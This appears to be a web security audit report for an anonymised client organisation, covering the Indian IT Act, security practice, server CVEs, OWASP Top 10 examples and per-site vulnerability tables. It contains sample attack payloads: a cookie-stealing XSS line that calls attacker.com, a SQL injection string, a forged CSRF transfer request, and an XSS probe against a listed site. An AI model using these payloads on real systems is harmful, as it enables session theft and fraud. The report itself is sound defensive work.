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Chapter-II of the Act specifically stipulates that any subscriber may authenticate an electronic record by affixing his digital signature. It further states that any person can verify an electronic record by use of a public key of the subscriber.Chapter-III of the Act details about Electronic Governance and provides inter alia amongst others that where any law provides that information or any other matter shall be in writing or in the typewritten or printed form, then, notwithstanding anything contained in such law, such requirement shall be deemed to have been satisfied if such information or matter is -rendered or made available in an electronic form; and accessible so as to be usable for a subsequent reference.The said chapter also details the legal recognition of Digital Signatures.Chapter-IV of the said Act gives a scheme for Regulation of Certifying Authorities. The Act envisages a Controller of Certifying Authorities who shall perform the function of exercising supervision over the activities of the Certifying Authorities as also laying down standards and conditions governing the Certifying Authorities as also specifying the various forms and content of Digital Signature Certificates. The Act recognizes the need for recognizing foreign Certifying Authorities and it further details the various provisions for the issue of license to issue Digital Signature Certificates.Chapter-VII of the Act details about the scheme of things relating to Digital Signature Certificates. The duties of subscribers are also enshrined in the said Act.Chapter-IX of the said Act talks about penalties and adjudication for various offences. The penalties for damage to computer, computer systems etc. has been fixed as damages by way of compensation not exceeding Rs. 1,00,00,000 to affected persons. The Act talks of appointment of any officers not below the rank of a Director to the Government of India or an equivalent officer of state government as an Adjudicating Officer who shall adjudicate whether any person has made a contravention of any of the provisions of the said Act or rules framed there under. The said Adjudicating Officer has been given the powers of a Civil Court.Chapter-X of the Act talks of the establishment of the Cyber Regulations Appellate Tribunal, which shall be an appellate body where appeals against the orders passed by the Adjudicating Officers, shall be preferred.Chapter-XI of the Act talks about various offences and the said offences shall be investigated only by a Police Officer not below the rank of the Deputy Superintendent of Police. These offences include tampering with computer source documents, publishing of information, which is obscene


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in electronic form, and hacking.The Act also provides for the constitution of the Cyber Regulations Advisory Committee, which shall advice the government as regards any rules, or for any other purpose connected with the said act. The said Act also proposes to amend the Indian Penal Code, 1860, the Indian Evidence Act, 1872, The Bankers' Books Evidence Act, 1891, The Reserve Bank of India Act, 1934 to make them in tune with the provisions of the IT Act.

Above excerpts from http://www.cyberlawsindia.net/Information-technology-act-of-india.html

What the IT Act(2000) means to the Client Organisation

Companies shall now be able to carry out electronic commerce using the legal infrastructure provided by the Act.

The IT Act also addresses the important issues of security, which are so critical to the success of electronic transactions. The Act has given a legal definition to the concept of secure digital signatures that would be required to have been passed through a system of a security procedure, as stipulated by the Government at a later date.

Under the IT Act, 2000, it shall now be possible for corporate / organizations to have a statutory remedy in case if anyone breaks into their computer systems or network and causes damages or copies data. The remedy provided by the Act is in the form of monetary damages, not exceeding Rs. 1 crore.

Above excerpts from http://www.cyberlawsindia.net/Information-technology-act-of-india.html


This section provides guidelines regarding the responsibilities and functions of each group who are directly involved with the development, deployment, operations, maintenance and security of all sites under client organisation. The personnel are divided into three groups namely Management, Operations and Development and the role of each has been detailed below.


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1. Make an active commitment to information security

2. Coordinate information security implementation

3. Allocate information security responsibilities

4. Establish an authorization process for all personnel

5. Perform independent information system reviews

6. Identify risks related to the use of external parties

7. Address security before end users are given access


1. Implement and act in accordance with the organization’s information security policies.

2. Protect assets from unauthorized access, disclosure, modification, destruction or interference.

3. Execute particular security processes or activities.

4. Ensure responsibility is assigned to the individual for actions taken.

5. Report security events or potential events or other security risks to the organization.


1. Employees, contractors and third party users should apply security in accordance with established policies and procedures of the organization.

2. Must be properly briefed on their information security roles and responsibilities prior to being granted access to sensitive information or information systems

3. Provided with guidelines which state the security expectations of their role within the organization.

4. Are motivated to fulfill the security policies of the organization.

5. Achieve a level of awareness on security relevant to their roles and responsibilities within the organization.

6. Conform to the terms and conditions of employment, which includes


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the organization’s information security policy and appropriate methods of working;

7. Continue to have the appropriate skills and qualifications.

VulnerabilitiesListed below are the staff vulnerabilities that probably exist which are formulated after visiting one of the pages in client’s site

There is no information security officerExplanationRiskWithout an information security officer, important security issues may not receive the proper attention. The overall security of the client may suffer. Recommendations

Designate an existing employee to fill the role of information security officer, or hire a qualified candidate for the position.

Provide training opportunities to the information security officer.

Encourage and support the acquisition of security certification(s).

Create an information security teamExplanationAn information security team is necessary to identify potential vulnerabilities in existing systems. Also, they will be the first response team in case of an emergency or exploit. Furthermore they will be better informed than a standard developer team to manage and handle such a crisis or exploit.RiskWithout such a team Client organisation will be powerless in providing an emergency response when an exploit is made. This may lead to financial losses as well as a loss in general reputation of the organization. Recommendations


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Form the team to work in conjunction with existing development team. Also include at least one member of the development team in the security team.

Network Security

Network Security handles the protection of both the information in networks and the protection of the supporting infrastructure.The secure management of networks, which may span organizational boundaries, requires careful consideration to dataflow, legal implications, monitoring, and protection.

Network Security Best PracticesSince we were unable to obtain access to your facilities and the equipment you use to manage the sites , here we have summarized some best practices that must be followed in managing your network security.

Key areas that your network should continuously monitor and periodically log would be

1. Network architecture and design

2. Communication channels

3. Network components

4. Network Attacks

ControlSecurity features, service levels, and management requirements of all network services should be identified and included in any network services agreement, whether these services are provided in-house or outsourced.

Implementation guidanceThe ability of the network service provider to manage agreed services in a secure way should be determined and regularly monitored, and the right and method to audit should be agreed.


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The security arrangements necessary for particular services, such as security features, service levels, and management requirements, should be identified. The organization should ensure that network service providers implement these measures.

Other informationNetwork services include the provision of connections, private network services, and value added networks and managed network security solutions such as firewalls and intrusion detection systems.

Organizational guidelinesListed below are some guidelines that needs to be enforced by the management within the organization

1. Operational responsibility for networks should be separated from computer operations where appropriate.

2. Responsibilities and procedures for the management of remote equipment, including equipment in user areas, should be established.

3. Special controls should be established to safeguard the confidentiality and integrity of data passing over public networks or over wireless networks, and to protect the connected systems and applications.

4. Special controls may also be required to maintain the availability of the network services and computers connected.

5. Appropriate logging and monitoring should be applied to enable recording of security relevant actions.

6. Management activities should be closely co-ordinated both to optimize the service to the organization and to ensure that controls are consistently applied across the information processing infrastructure.

7. Secure standards should be applied for security of network services, such as authentication, encryption, and network connection controls.

8. Technical parameters required for secured connection with the network services must be in place in accordance with the security and network connection rules.

9. Procedures for the network service usage to restrict access to network services or applications, where necessary.


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System Security

System Security of an information system includes operating systems, infrastructure, business applications, off-the-shelf products, services, and user-developed applications.

Security requirements should be identified and agreed prior to the development and/or implementation of information systems.

All security requirements should be identified at the requirements phase of a project and justified, agreed and documented as part of the overall security of an information system.

VulnerabilitiesBased on the information derived from the Asset Identification section we have found that some of the server configurations and back end solutions you use to support your Web Applications have known and documented vulnerabilities. All these vulnerabilities have been patched up in the latest stable releases of the corresponding server/back end solution. The obvious suggestion/solution is to move your applications to the latest version of these server/back end solutions.

Apache 2.2.3Risk

protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.

scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.


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Zend Server 4.0Risk

Zend Server is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the Optimizer+, Code Tracing, Job Queue, Java Bridge, Debugger, and Code Tracing components. A remote attacker could exploit this vulnerability using the multiple fields to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

Microsoft IIS 6.0Risk

The Web Server fails to properly handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can result in authentication bypass of password protected folders, listing, downloading and uploading of files into a password protected WebDAV folder

Perl 5.8.8Risk

A UTF-8 crafted regular expression could cause a denial of service on certain operating systems.

PHP 5.3.6Risk

File path injection is possible. If a file name starts with \ or / and has no other (back) slashes, it's left as-is and it is possible to store in root directory.


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Application Security

All the application security issues/defects/vulnerabilities have been stated in chapter 3 as part of the Executive Summary. Also the threat assessment for each has been arrived as per the method described earlier. This section deals with common vulnerabilities specified by OWASP, a non-profit organization engaged in Web Application Security. These are provided for the benefit of future web development for/by your organization.This section also serves as an awareness of common pitfalls in Web Application Development and contains example scenarios to explain each of the vulnerability in detail.

OWASP TOP 10The Open Web Application Security Project (OWASP http://www.owasp.org/) is an open-source application security project. The OWASP community includes corporations, educational organizations and individuals from around the world. This community works to create freely-available articles, methodologies, documentation, tools, and technologies. OWASP advocates approaching application security by considering the people, process, and technology dimensions.The OWASP Top 10 is a list identifying the most serious risks for a broad array of organizations in the domain of Web Application Security. For each of these risks, OWASP provides generic information about likelihood and technical impact using a simple ratings scheme, which is based on the OWASP Risk Rating Methodology.

InjectionDescriptionInjection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing. Scanners and fuzzers can help attackers find them.

Exploitability: Easy


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Impact: Severe


The application uses untrusted data in the construction of the following vulnerable SQL call:

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'";

The attacker modifies the 'id' parameter in their browser to send: ' or '1'='1. This changes the meaning of the query to return all the records from the accounts database, instead of only the intended customer's.http://example.com/app/accountView?id=' or '1'='1

In the worst case, the attacker uses this weakness to invoke special stored procedures in the database, allowing a complete takeover of the database host.


Preventing injection requires keeping untrusted data separate from commands and queries.

1. The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Beware of APIs, such as stored procedures that appear parameterized, but may still allow injection under the hood.

2. If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. 

3. Positive or "whitelist" input validation with appropriate canonicalization also helps protect against injection, but is not a complete defense as many applications require special characters in their input. 

Cross Site Scripting (XSS)DescriptionXSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are three known types of XSS flaws:


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1) Stored 2) Reflected3) DOM based XSS

Exploitability: Average

Impact: Moderate


The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "⟨input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'⟩";

The attacker modifies the ‘CC’ parameter in their browser to:

'⟩⟨script⟩document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie⟨/script⟩'.

This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.


Preventing XSS requires keeping untrusted data separate from active browser content.

1. The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications unless their UI framework does this for them.

2. Positive or “whitelist” input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications must accept special characters. Such validation should decode any encoded input, and then validate the length, characters, and format on that data before accepting the input.

Broken Authentication and Session ManagementDescription


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Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.

Exploitability: Average

Impact: Severe


Scenario #1: Airline reservations application supports URL rewriting, putting session IDs in the URL:http://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii

An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.

Scenario #2: Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.

Scenario #3: Insider or external attacker gains access to the system’s password database. User passwords are not encrypted, exposing every users’ password to the attacker.


The primary recommendation for an organization is to make available to developers:

1. A single set of strong authentication and session management controls. Such controls should strive to have a simple interface for developers.

2. Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs


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Insecure Direct Object ReferenceDescriptionApplications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws and code analysis quickly shows whether authorization is properly verified.

Exploitability: Easy

Impact: Moderate


The application uses unverified data in a SQL call that is accessing account information:

String query = "SELECT * FROM accts WHERE account = ?";PreparedStatement pstmt = connection.prepareStatement(query , ... );pstmt.setString( 1, request.getParameter("acct"));ResultSet results = pstmt.executeQuery();

The attacker simply modifies the ‘acct’ parameter in their browser to send whatever account number they want. If not verified, the attacker can access any user’s account, instead of only the intended customer’s account.



Preventing insecure direct object references requires selecting an approach for protecting each user accessible object (e.g., object number, filename):

1. Use per user or session indirect object references. This prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource’s database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. The


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application has to map the per-user indirect reference back to the actual database key on the server.

2. Check access. Each use of a direct object reference from an untrusted source must include an access control check to ensure the user is authorized for the requested object.

Cross Site Request Forgery (CSRF)DescriptionCSRF takes advantage of web applications that allow attackers to predict all the details of a particular action. Since browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.

Exploitability: Average

Impact: Moderate


The application allows a user to submit a state changing request that does not include anything secret. Like so:http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

So, the attacker constructs a request that will transfer money from the victim’s account to their account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

If the victim visits any of these sites while already authenticated to example.com, any forged requests will include the user’s session info, inadvertently authorizing the request.


Preventing CSRF requires the inclusion of an unpredictable token in the body or URL of each HTTP request. Such tokens should at a minimum be unique per user session, but can also be unique per request.


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1. The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is subject to exposure.

2. The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs the risk that the URL will be exposed to an attacker, thus compromising the secret token.

Security MisconfigurationDescriptionSecurity Misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Developers and network administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.

Exploitability: Easy

Impact: Moderate


Scenario #1: Your application relies on a powerful framework like Struts or Spring. XSS flaws are found in these framework components you rely on. An update is released to fix these flaws but you don’t update your libraries. Until you do, attackers can easily find and exploit these flaws in your app.

Scenario #2: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.

Scenario #3: Directory listing is not disabled on your server. Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she reverse engineers to get all your custom code. She then finds a serious access control flaw in your application.

Scenario #4: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide.


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The primary recommendations are to establish all of the following:

1. A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically. This process should be automated to minimize the effort required to setup a new secure environment.

2. A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This needs to include all code libraries as well, which are frequently overlooked.

3. A strong application architecture that provides good separation and security between components.

4. Consider running scans and doing audits periodically to help detect future misconfigurations or missing patches.

Insecure Cryptographic StorageDescriptionThe most common flaw in this area is simply not encrypting data that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys, and weak algorithm usage is common. Use of weak or unsalted hashes to protect passwords is also common. External attackers have difficulty detecting such flaws due to limited access. They usually must exploit something else first to gain the needed access.

Exploitability: Difficult

Impact: Severe


Scenario #1: An application encrypts credit cards in a database to prevent exposure to end users. However, the database is set to automatically decrypt queries against the credit card columns, allowing an SQL injection flaw to retrieve all the credit cards in cleartext. The system should have been configured to allow only back end applications to decrypt them, not the front end web application.

Scenario #2: A backup tape is made of encrypted health records, but the encryption key is on the same backup. The tape never arrives at the backup center.


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Scenario #3: The password database uses unsalted hashes to store everyone’s passwords. A file upload flaw allows an attacker to retrieve the password file. All the unsalted hashes can be brute forced in 4 weeks, while properly salted hashes would have taken over 3000 years.


The following are recommendations to prevent insecure cryptographic storage

1. Considering the threats you plan to protect this data from (e.g., insider attack, external user), make sure you encrypt all such data at rest in a manner that defends against these threats.

2. Ensure offsite backups are encrypted, but the keys are managed and backed up separately.

3. Ensure appropriate strong standard algorithms and strong keys are used, and key management is in place.

4. Ensure passwords are hashed with a strong standard algorithm and an appropriate salt is used.

5. Ensure all keys and passwords are protected from unauthorized access.

Failure to Restrict URL AccessDescriptionApplications are not always protecting page requests properly. Sometimes, URL protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget.

Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack.

Exploitability: Easy

Impact: Moderate


The attacker simply forces browsers to target URLs. Consider the following URLs which are both supposed to require authentication. Admin rights are also required for access to the “admin_getappInfo” page.


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If the attacker is not authenticated, and access to either page is granted, then unauthorized access was allowed. If an authenticated, non-admin, user is allowed to access the “admin_getappInfo” page, this is a flaw, and may lead the attacker to more improperly protected admin pages.

Such flaws are frequently introduced when links and buttons are simply not displayed to unauthorized users, but the application fails to protect the pages they target.


Preventing unauthorized URL access requires selecting an approach for requiring proper authentication and proper authorization for each page. Frequently, such protection is provided by one or more components external to the application code. Regardless of the mechanism(s), all of the following are recommended:

1. The authentication and authorization policies are role based, to minimize the effort required to maintain these policies.

2. The policies should be highly configurable, in order to minimize any hard coded aspects of the policy.

3. The enforcement mechanism(s) should deny all access by default, requiring explicit grants to specific users and roles for access to every page.

4. If the page is involved in a workflow, check to make sure the conditions are in the proper state to allow access.

Insufficient Transport Layer ProtectionDescriptionApplications frequently do not protect network traffic. They may use SSL/TLS during authentication, but not elsewhere, exposing data and session IDs to interception. Expired or improperly configured certificates may also be used.

Detecting basic flaws is easy. Just observe the site’s network traffic. More subtle flaws require inspecting the design of the application and the server configuration.

Exploitability: Difficult


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Impact: Moderate


Scenario #1: A site simply doesn’t use SSL for all pages that require authentication. Attacker simply monitors network traffic (like an open wireless or their neighborhood cable modem network), and observes an authenticated victim’s session cookie. Attacker then replays this cookie and takes over the user’s session.

Scenario #2: A site has improperly configured SSL certificate which causes browser warnings for its users. Users have to accept such warnings and continue, in order to use the site. This causes users to get accustomed to such warnings. Phishing attack against the site’s customers lures them to a lookalike site which doesn’t have a valid certificate, which generates similar browser warnings. Since victims are accustomed to such warnings, they proceed on and use the phishing site, giving away passwords or other private data.

Scenario #3: A site simply uses standard ODBC/JDBC for the database connection, not realizing all traffic is in the clear.


Providing proper transport layer protection can affect the site design. It’s easiest to require SSL for the entire site. For performance reasons, some sites use SSL only on private pages. Others use SSL only on ‘critical’ pages, but this can expose session IDs and other sensitive data. At a minimum, do all of the following:

1. Require SSL for all sensitive pages. Non-SSL requests to these pages should be redirected to the SSL page.

2. Set the ‘secure’ flag on all sensitive cookies.3. Configure your SSL provider to only support strong algorithms.4. Ensure your certificate is valid, not expired, not revoked, and matches

all domains used by the site.5. Backend and other connections should also use SSL or other

encryption technologies.


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Unvalidated Redirects and ForwardsDescriptionApplications frequently redirect users to other pages, or use internal forwards in a similar manner. Sometimes the target page is specified in an unvalidated parameter, allowing attackers to choose the destination page.

Exploitability: Average

Impact: Moderate


Scenario #1: The application has a page called “redirect.jsp” which takes a single parameter named “url”. The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.http://www.example.com/redirect.jsp?url=evil.com

Scenario #2: The application uses forward to route requests between different parts of the site. To facilitate this, some pages use a parameter to indicate where the user should be sent if a transaction is successful. In this case, the attacker crafts a URL that will pass the application’s access control check and then forward the attacker to an administrative function that she would not normally be able to access.http://www.example.com/boring.jsp?fwd=admin.jsp


Safe use of redirects and forwards can be done in a number of ways:

1. Simply avoid using redirects and forwards.2. If used, don’t involve user parameters in calculating the destination.

This can usually be done.3. If destination parameters can’t be avoided, ensure that the supplied

value is valid, and authorized for the user.

Operational Security

Operational Security deals with the correct and secure operation of information processing facilities. Responsibilities and procedures for the management and operation of all information processing facilities should be established.


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This includes the development of appropriate operating procedures. Segregation of duties should be implemented, where appropriate, to reduce the risk of negligent or deliberate system misuse.

Also the organization must implement and maintain the appropriate level of information security and service delivery in line with third party service delivery agreements.

The organization should check the implementation of agreements, monitor compliance with theagreements and manage changes to ensure that the services delivered meet all requirements agreed with the third party.

The integrity and availability of information and information processing facilities is paramount and most always be vigilantly monitored.

Operational Security Best PracticesHere is a summary of some best practices relating to Operational Security that must be implemented in every organization.


1. Operating procedures should be documented, maintained, and made available to all users who need them.

2. Changes to information processing facilities and systems should be controlled.

3. Duties and areas of responsibility should be segregated to reduce opportunities for unauthorized or unintentional modification or misuse of the organization’s assets.

4. It should be ensured that the security controls, service definitions and delivery levels included in the third party service delivery agreement are implemented, operated, and maintained by the third party.

5. The use of resources should be monitored, tuned, and projections made of future capacity


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requirements to ensure the required system performance.

6. Detection, prevention, and recovery controls to protect against malicious code and appropriate user awareness procedures should be implemented.

7. Back-up copies of information and software should be taken and tested regularly in accordance with the agreed backup policy.

Implementation guidance

1. Documented procedures should be prepared for system activities associated with information processing and communication facilities, such as computer start-up and close-down procedures, backup, equipment maintenance, media handling, computer room and mail handling management, and safety.

2. The operating procedures should specify the instructions for the detailed execution of each job including:

processing and handling of information


instructions for handling errors or other exceptional conditions

system restart and recovery procedures for use in the event of system failure

the management of audit-trail and system log information.

3. Operational systems and application software should be subject to strict change management control. In particular, the following items should be considered:

identification and recording of significant changes

planning and testing of changes


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assessment of the potential impacts, including security impacts, of such changes

formal approval procedure for proposed changes

communication of change details to all relevant persons

fallback procedures, including procedures and responsibilities for aborting and recovering

4. Segregation of duties is a method for reducing the risk of accidental or deliberate system misuse.

5. The initiation of an event should be separated from its authorization. The possibility of collusion should be considered in designing the controls.

6. Small organizations may find segregation of duties difficult to achieve, but the principle should be applied as far as is possible and practicable. Whenever it is difficult to segregate, other controls such as monitoring of activities, audit trails and management supervision should be considered.

7. Monitoring and review of third party services should ensure that the information security terms and conditions of the agreements are being adhered to, and that information security incidents and problems are managed properly. This should involve a service management relationship and process between the organization and the third party to:

monitor service performance levels to check adherence to the agreements

review service reports produced by the third party and arrange regular progress meetings as required by the agreements

review third party audit trails and records of security events, operational problems, failures, tracing of faults and disruptions related to the service delivered.


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resolve and manage any identified problems

8. The responsibility for managing the relationship with a third party should be assigned to a designated individual or service management team.

9. Appropriate action should be taken when deficiencies in the service delivery are observed.

10.The organization should maintain sufficient overall control and visibility into all security aspects for sensitive or critical information or information processing facilities accessed, processed or managed by a third party.

11.The organization should ensure they retain visibility into security activities such as

change management, identification of vulnerabilities, and information security incident

reporting/response through a clearly defined reporting process, format and structure.

12.Accurate and complete records of the back-up copies and documented restorationprocedures should be produced.

13.The back-ups should be stored in a remote location, at a sufficient distance to escape anydamage from a disaster at the main site.

14.Restoration procedures should be regularly checked and tested to ensure that they are

effective and that they can be completed within the time allotted in the operational

procedures for recovery.

15.In situations where confidentiality is of importance, back-ups should be protected by means of encryption.


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Other informationIn case of outsourcing, the organization needs to be aware that the ultimate responsibility forinformation processed by an outsourcing party remains with the organization.

Back up arrangements can be automated to ease the back-up and restore process. Such automatedsolutions should be sufficiently tested prior to implementation and at regular intervals.

Physical Security

The primary objective of physical security is to prevent unauthorized physical access, damage, and interference to the organization’s premises and information.Physical Security also aims to prevent loss, damage, theft or compromise of assets and interruption to the organization’s activities.Critical or sensitive information processing facilities should be housed in secure areas, protected by defined security perimeters, with appropriate security barriers and entry controls. They should be physically protected from unauthorized access, damage, and interference.Equipment should be protected from physical and environmental threats. Special controls may be required to protect against physical threats, and to safeguard supporting facilities, such as the electrical supply and cabling infrastructure.The protection provided should be commensurate with the identified risks.

Physical Security Best PracticesSince we were unable to obtain access to your facilities and the equipment you use to manage the sites here we have summarized some best practices that must be followed in managing your physical security.

Control1. Security perimeters (barriers such as walls, card controlled entry gates

or manned reception desks) should be used to protect areas that contain information and information processing facilities.


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2. Secure areas should be protected by appropriate entry controls to ensure that only authorized personnel are allowed access.

3. Physical security for offices, rooms, and facilities should be designed and applied.

4. Physical protection against damage from fire, flood, earthquake, explosion, civil unrest, and other forms of natural or man-made disaster should be designed and applied.

5. Equipment should be sited or protected to reduce the risks from environmental threats and hazards and opportunities for unauthorized access.

Implementation guidance

1. The following guidelines should be considered and implemented where appropriate for physical security perimeters:

Security perimeters should be clearly defined

Perimeters of a building or site containing information processing facilities should be physically sound

The external walls of the site should be of solid construction and all external doors should be suitably protected against unauthorized access with control mechanisms

Doors and windows should be locked when unattended and external protection should be considered for windows, particularly at ground level

Physical barriers should, where applicable, be built to prevent unauthorized physical access and environmental contamination

All fire doors on a security perimeter should be alarmed, monitored, and tested in conjunction with the walls to establish the required level of resistance in accordance to suitable regional, national, and international standards


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Suitable intruder detection systems should be installed to national, regional or international standards and regularly tested to cover all external doors and accessible windows

Information processing facilities managed by the organization should be physically separated from those managed by third parties.

2. With regards to personnel the following guidelines should be followed:

Access to areas where sensitive information is processed or stored should be controlled and restricted to authorized persons only

Authentication controls, e.g. access control card plus PIN, should be used to authorize and validate all access

An audit trail of all access should be securely maintained

All employees, contractors and third party users and all visitors should be required to wear some form of visible identification

Third party support service personnel should be granted restricted access to secure areas or sensitive information processing facilities only when required

3. The following guidelines should be considered to secure offices, rooms, and facilities:

Account should be taken of relevant health and safety regulations and standards

Key facilities should be sited to avoid access by the public

Where applicable, buildings should be unobtrusive and give minimum indication of their purpose, with no obvious signs,


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outside or inside the building identifying the presence of information processing activities

4. The following guidelines should be considered to protect equipment:

Equipment should be sited to minimize unnecessary access into work areas

Items requiring special protection should be isolated to reduce the general level of protection required

Controls should be adopted to minimize the risk of potential physical threats, e.g. theft, fire, explosives, smoke, water (or water supply failure), dust, vibration, chemical effects, electrical supply interference, communications interference, electromagnetic radiation and vandalism;

Other informationPhysical protection can be achieved by creating one or more physical barriers around the organization’s premises and information processing facilities. A secure area may be a lockable office, or several rooms surrounded by a continuous internal physical security barrier.

Special consideration towards physical access security should be given to buildings where multiple organizations are housed.


This section contains a series of tables which highlight the issues/defects/vulnerabilities found in each web site under Client Organisation. Detailed explanation of each class of issue/defect/vulnerability have been explained in the Executive Summary and supplemented in the Application Security section.

For #Site2S. #

URL Issues Fixes Remarks/ Guidelines/ Future Best


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Practices1 http://


Password Transmitted over HTTP

Implement SSL A malicious user in your network can access the packets you send using a sniffer program which might contain your username and password

2 http://www.clientorganisation.com/redeem.php?act=Add

XSS (Cross Site Scripting)

Proper Special Character Escaping

XSS (Cross site scripting) is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.

3 http://www.clientorganisation.com/surecontact/data/logins.php

Auto complete enabled

Auto complete must be disabled in the form tag

Auto complete enabled for a form may lead to


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unauthorized users getting access to privileged information in same machine

4 https://www.clientorganisation.com/houston/about/

Internal Server Error (ISE)

Check your server side code and see if all scenarios are handled

ISE is usually triggered when exceptions are not properly handled at the server side

5 http://www.clientorganisation.com/resources/includes/checkMegaCoupon.php/

Insecure Direct Object Reference

Ensure that exceptions are handled properly and only authorized users can access such objects

This could be a serious threat as it openly reveals information about files on the server and need to be rectified immediately

6 http://www.clientorganisation.com/home.php/

Form Login uses GET Method

Change Form Method from GET to POST

This a simple coding defect but can lead to serious problems since query string becomes visible in browser’s URL and can be read by


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anyone who uses the browser

For #Site3S. #

URL Issues Fixes Remarks/ Guidelines/ Future Best Practices

1 https://www.clientorganisation.org/xmlrpc.php

Password transmitted over HTTP

Implement SSL A malicious user in your network can access the packets you send using a sniffer program which might contain your username and password

2 http://www.clientorganisation.org/wp-login.php?redirect_to=http://www.clientorganisation.org/wp-admin/edit-comments.php&reauth=1

Password transmitted over HTTP

Implement SSL A malicious user in your network can access the packets you send using a sniffer program which might contain your username and password

3 http://www.clientorganisation.org/wp-login.php?action=lostpassword

Security Mis - configuration

Change administrator credentials (Different username and password)

Brute Force attack is highly possible since attacker already knows your


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username and username like admin is highly common

4 http://www.clientorganisation.org/wp-login.php?redirect_to=http://www.clientorganisation.org/wp-admin/&reauth=1

Auto complete enabled

Auto complete must be disabled in the form tag

Auto complete enabled for a form may lead to unauthorized users getting access to privileged information in same machine

5 http://www.clientorganisation.org/store/

Internal Server Error (ISE)

Check your server side code and see if all scenarios are handled

ISE is usually triggered when exceptions are not properly handled at the server side

6 https://www.clientorganisation.org/event-registration/

CVV code is not password field and auto complete disabled

For all the registration pages the CVV code field must be made password and auto complete disabled

Otherwise any user’s (registered) credit card & CVV can be found out by pressing down arrow in the particular field in the form

7 https:// No Change your This is a


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server side validation

design so that client information is properly sanitized at server side before being forwarded to paypal

serious design flaw that needs to be addressed immediately

8 https://www.clientorganisation.org/event-registration/

XSS (Cross Site Scripting)

Proper Special Character Escaping

XSS (Cross site scripting) is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.

9 https://www.clientorganisation.org/event-registration/

Failure to Restrict URL Access

If the attacker is not authenticated, and access to authenticated page is granted, then unauthorized access is

Proper authentication and proper authorization must be carried out for each page.


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allowed. This makes the site highly vulnerable.

For #Site4S. #

URL Issues Fixes Remarks/ Guidelines/ Future Best Practices

1 http://www.clientorganisation.com/

Cookie not marked HTTPOnly

Ensure that all your cookies can only be modified at the server side by making it HTTPOnly

Not making cookies HTTPOnly means they can be modified by the user in the browser. If the cookie is used to store authentication information then this could be a serious issue since it is very easy to modify cookie value

2 http://www.clientorganisation.com/Products/Mistakes/pid-1039344.aspx%22%20stYle=%22x:expre/**/ssion(alert(9))

XSS (Cross Site Scripting)

Proper Special Character Escaping

XSS (Cross site scripting) is the most prevalent web application security flaw. XSS flaws occur when


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an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.

3 http://www.clientorganisation.com/Registration/

Forbidden Resource

Implement some kind of redirect mechanism and remove links that lead to forbidden resources for unauthorized users

